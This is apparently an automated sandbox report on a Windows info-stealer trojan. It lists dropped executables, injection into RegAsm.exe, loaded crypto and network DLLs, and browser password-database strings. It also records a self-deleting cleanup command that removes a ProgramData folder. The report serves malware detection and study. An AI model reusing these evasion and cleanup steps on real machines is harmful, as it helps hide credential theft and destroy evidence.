Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004074B0	10_2_004074B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B570	10_2_0040B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004366E0	10_2_004366E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041D6A0	10_2_0041D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00449700	10_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004117C0	10_2_004117C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042F7DB	10_2_0042F7DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00403890	10_2_00403890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0044A8B0	10_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004488B0	10_2_004488B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00436970	10_2_00436970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041399C	10_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00427AFB	10_2_00427AFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042BC50	10_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00413CC6	10_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042CCDD	10_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042CCF5	10_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00429DF2	10_2_00429DF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00437D90	10_2_00437D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040CE00	10_2_0040CE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00431E00	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00415EF6	10_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00407EB0	10_2_00407EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00427F62	10_2_00427F62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00443FA0	10_2_00443FA0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\BKKKEGIDBG.exe 7B794C5BDB820791F0359DA90A9A4F258412B8FEEF9C6E6A0411F6AEAD9D3A04
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C109B10 appears 70 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C26D930 appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040EE60 appears 145 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C26DAE0 appears 52 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CBE0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C103620 appears 61 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2609D0 appears 247 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1776

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.1720203839.000000000077E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exed! vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BKKKEGIDBG.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66eef0ca0fb35_lfdsa[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/35@7/8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C140300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

3_2_6C140300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\BKKKEGIDBG.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5224
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: HJDBKJ.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2440185100.0000000022AB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 26%
Source: file.exe	Virustotal: Detection: 38%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKKKEGIDBG.exe "C:\ProgramData\BKKKEGIDBG.exe"
Source: C:\ProgramData\BKKKEGIDBG.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\BKKKEGIDBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAEHCFCBKKJD" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1788
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKKKEGIDBG.exe "C:\ProgramData\BKKKEGIDBG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAEHCFCBKKJD" & exit	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
